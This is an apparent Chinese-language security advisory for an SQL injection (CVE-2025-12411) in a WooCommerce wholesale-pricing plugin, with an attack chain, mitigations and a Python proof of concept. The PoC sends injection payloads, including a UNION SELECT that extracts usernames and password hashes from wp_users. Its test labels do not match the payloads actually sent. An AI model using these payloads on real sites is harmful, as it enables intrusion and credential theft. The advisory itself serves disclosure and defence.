CVE-2025-12411 WordPress Premmerce Wholesale Pricing插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12411

漏洞类型

SQL注入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Premmerce Wholesale Pricing for WooCommerce

漏洞概述

CVE-2025-12411是WordPress插件Premmerce Wholesale Pricing for WooCommerce中的一个高危SQL注入漏洞。该插件主要用于为WooCommerce电商网站提供批发定价功能。漏洞源于版本1.1.10及之前版本中，对用户提供的'ID'参数和'price_type'参数缺乏充分的输入验证和SQL查询预处理。攻击者可以通过WordPress的admin-post.php接口，利用'premmerce_update_price_type'和'premmerce_delete_price_type'动作发起攻击。成功利用此漏洞，认证用户（订阅者级别及以上）可以操纵SQL查询，不仅能够从数据库中提取敏感信息（如用户数据、订单信息等），还能修改价格类型显示名称，造成管理界面显示异常。由于该插件涉及电商定价功能，漏洞可能导致商业敏感数据泄露或价格体系被恶意篡改，对使用该插件的电商网站构成严重安全威胁。

技术细节

该SQL注入漏洞的根本原因在于代码中直接使用了用户可控的输入参数而未进行适当的安全处理。在src/Admin/Admin.php第83行和src/Models/Model.php第171行的代码实现中，'ID'参数被直接拼接到SQL查询语句中。攻击者可以通过构造特殊的SQL payload（如UNION SELECT或布尔盲注技术）来提取数据库内容。攻击主要通过两个端点实现：1) admin-post.php?action=premmerce_update_price_type，其中'ID'参数存在注入点，可用于修改价格类型；2) admin-post.php?action=premmerce_delete_price_type，其中'price_type'参数存在注入点。由于WordPress的admin-post.php默认不进行nonce验证（除非代码主动添加），且该插件未实现足够的权限检查，使得任何订阅者级别以上的用户都能发起攻击。攻击者通常需要先获取WordPress账户（订阅者角色最低要求），然后构造恶意请求即可实现无感知的数据窃取。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本和Premmerce Wholesale Pricing插件版本（<=1.1.10），确认插件是否激活

STEP 2

Authentication

攻击者获取WordPress订阅者级别或更高权限的账户（可以通过注册功能或利用其他漏洞获得）

STEP 3

Payload Crafting

攻击者构造恶意SQL注入payload，针对'ID'参数（premmerce_update_price_type）或'price_type'参数（premmerce_delete_price_type）

STEP 4

Exploitation

通过POST请求发送恶意参数到admin-post.php，利用SQL注入漏洞操纵数据库查询

STEP 5

Data Extraction/Modification

成功注入后，攻击者可以提取数据库中的敏感信息（如wp_users表中的用户名和密码哈希），或修改价格类型数据

STEP 6

Persistence

攻击者可能利用获取的凭据进一步入侵，或在数据库中植入持久性后门

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import urlencode

# CVE-2025-12411 SQL Injection PoC
# Target: Premmerce Wholesale Pricing for WooCommerce <= 1.1.10
# Attack Vector: ID parameter in premmerce_update_price_type action

target_url = "http://target-site.com/wp-admin/admin-post.php"

# Authentication: Attacker needs subscriber-level WordPress account
# Replace with valid WordPress session cookies
cookies = {
    'wordpress_test_cookie': 'WP Cookie check',
    'wordpress_logged_in_user': 'attacker_user_id',
    'wordpress_sec': 'attacker_session_token'
}

# SQL Injection Payloads
# Boolean-based blind injection to extract database version
payload_id = "1 AND (SELECT CASE WHEN (SUBSTRING(@@version,1,1)='8') THEN SLEEP(5) ELSE 0 END)"

# UNION-based injection to extract users table
payload_union = "1 UNION SELECT 1,2,3,4,5,user_login,user_pass,8,9,10 FROM wp_users LIMIT 0,1--"

# Data exfiltration via premmerce_update_price_type
data_update = {
    'action': 'premmerce_update_price_type',
    'ID': payload_union,
    'price_type_name': 'Malicious Price Type',
    'price_type_slug': 'malicious-slug'
}

# Data exfiltration via premmerce_delete_price_type
data_delete = {
    'action': 'premmerce_delete_price_type',
    'price_type': "normal' OR '1'='1",
    '_wpnonce': ''  # May not be required if plugin doesn't implement nonce check
}

print("[*] CVE-2025-12411 SQL Injection Test")
print(f"[*] Target: {target_url}")

# Test blind injection
print("[*] Testing boolean-based blind injection...")
response = requests.post(target_url, data=data_update, cookies=cookies)

# Test UNION injection
print("[*] Testing UNION-based injection...")
response = requests.post(target_url, data=data_delete, cookies=cookies)

print("[*] Request sent. Check response or database for results.")
print("[*] Note: This PoC requires valid WordPress authentication with subscriber+ role")

影响范围

Premmerce Wholesale Pricing for WooCommerce <= 1.1.10

防御指南

临时缓解措施

在官方安全补丁发布前，建议采取以下临时缓解措施：1) 立即禁用Premmerce Wholesale Pricing插件或替换为其他替代方案；2) 检查并移除任何可疑的管理员账户；3) 检查wp_options和数据库中是否有异常的价格类型数据；4) 限制WordPress注册功能，防止未授权用户注册；5) 使用WordPress安全插件设置IP黑名单，阻止可疑请求；6) 监控admin-post.php的访问日志，关注异常的premmerce_update_price_type和premmerce_delete_price_type请求；7) 考虑暂时关闭WooCommerce的批发定价功能，待插件更新后再启用。